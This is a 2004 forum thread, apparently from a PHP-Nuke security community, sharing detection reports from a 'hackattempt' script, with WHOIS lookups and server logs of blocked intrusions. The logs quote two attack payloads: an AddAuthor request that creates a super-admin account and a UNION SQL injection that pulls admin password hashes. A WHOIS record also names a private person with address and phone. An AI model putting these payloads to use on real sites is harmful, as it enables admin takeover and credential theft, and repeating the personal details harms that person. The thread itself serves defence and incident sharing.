Busted - Thank you, Raven

Posted: Wed Mar 31, 2004 9:58 am

Quote:

80.55.93.226

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: whois://whois.ripe.net

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail: search-ripe-ncc-not-arin@ripe.net

DOCUMENT_ROOT :public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80

SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1

Posted: Mon Apr 05, 2004 12:27 am

This one busted by RavenScript Tonight.

The Proxy reported by the Script was:

Quote:

80.80.128.163
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL

ReferralServer: whois://whois.ripe.net

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate:
Updated: 2004-03-16

OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail: search-ripe-ncc-not-arin@ripe.net

HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987 SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME : www.64bit.us
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php

A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:

Quote:

inetnum: 80.80.133.64 - 80.80.133.95
netname: ANGELSOFT-FORCE
descr: Force computer club IP addresses
country: BG
admin-c: STB1-RIPE
tech-c: AN767-RIPE
status: ASSIGNED PA
notify: zvezdi@langame.net
mnt-by: AS12829-MNT
changed: zvezdi@langame.net 20011101
source: RIPE

route: 80.80.132.0/22
descr: Angelsoft's clients aggregated route
origin: AS12829
notify: zvezdi@langame.net
notify: xds@langame.net
mnt-by: AS12829-MNT
changed: zvezdi@langame.net 20020724
source: RIPE

role: Angelsoft NOC
address: 5 Kostaki Peev Str.
address: Plovdiv 4000
address: Bulgaria
phone: +359 32 635 211
fax-no: +359 32 638 209
e-mail: xds@langame.net
e-mail: angel@langame.net
trouble: visit http://www.langame.net
trouble: voice:
trouble: +359 32 635 211
trouble: +359 32 638 209
admin-c: AG5443-RIPE
tech-c: AY279-RIPE
nic-hdl: AN767-RIPE
remarks: This role object holds the handles of
remarks: supporting staff of AngelSoft ET
remarks: 5 Kostaki Peev Str.
remarks: Plovdiv
remarks: Bulgaria
notify: xds@langame.net
mnt-by: AS12829-MNT
changed: zvezdi@langame.net 20010712
changed: zvezdi@langame.net 20020919
changed: zvezdi@langame.net 20030425
source: RIPE

person: Smilen Todorov Botev
address: 21 "Stoian Sredev"
address: Saedinenie
address: Plovdiv area
address: Bulgaria
phone: +359 88 964 794
e-mail: smilen81@yahoo.com
nic-hdl: STB1-RIPE
notify: smilen81@yahoo.com
notify: zvezdi@langame.net
changed: zvezdi@langame.net 20011101
source: RIPE

Posted: Thu Apr 08, 2004 6:02 pm

Busted 217.219.75.92 / 216.148.246.70

Quote:

OrgName: CERFnet
OrgID: CERF
Address: 5738 Pacific Center Blvd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US

NetRange: 216.148.0.0 - 216.148.255.255
CIDR: 216.148.0.0/16
NetName: CERFNET-BLK-4
NetHandle: NET-216-148-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: DBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: CBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: DMTU.MT.NS.ELS-GMS.ATT.NET
NameServer: CMTU.MT.NS.ELS-GMS.ATT.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1998-12-03
Updated: 2000-03-09

TechHandle: CERF-HM-ARIN
TechName: AT&T Enhanced Network Services
TechPhone: +1-858-812-5000
TechEmail: notify@attens.com

OrgTechHandle: NETWO10-ARIN
OrgTechName: Network Provisioning
OrgTechPhone: +1-800-876-2373
OrgTechEmail: iptool@attens.com

HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409 SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php

Posted: Thu May 20, 2004 9:56 am

Ravan caught one for me - May 19, 2004 10:19PM (MST)

Quote:

201.5.225.38

OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: whois://whois.lacnic.net

NetRange: 201.0.0.0 - 201.255.255.255
CIDR: 201.0.0.0/8
NetName: LACNIC-201
NetHandle: NET-201-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: NS2.DNS.BR
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
Comment: This IP address range is under LACNIC responsibility
Comment: for further allocations to users in LACNIC region.
Comment: Please see http://www.lacnic.net/ for further details,
Comment: or check the WHOIS server located at whois.lacnic.net
RegDate: 2003-04-03
Updated: 2004-03-18

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: abuse@lacnic.net

PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST : www.lazarusmaze.com
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN : webmaster@lazarusmaze.net
SERVER_NAME : www.lazarusmaze.net
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

New Member Joined: Dec 22, 2003 Posts: 21

My site was hacked this weekend despite the script being in place and operational (tested as per Ravens Readme file). They must have found another way in. How I don't know as no report was generated and emailed.

Plastered all over the place was: ‘This Sait Hacked by Leroy Security Team’

Wouldn't be so bad of they could at least Spell!!

Are there any other security enhancements that you guys can recommend?

regards
James Mc

Posted: Tue Jun 01, 2004 6:27 am

This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used.

Posted: Tue Jun 01, 2004 9:47 am

I have all three (this script, chatserv & sentenal) and I went from being hacked once a week to not seeing anything.

Posted: Tue Jun 01, 2004 4:34 pm

Hi Raven

Thanks for the input. Much appreciated.

Keep up the good work..

regards
James Mc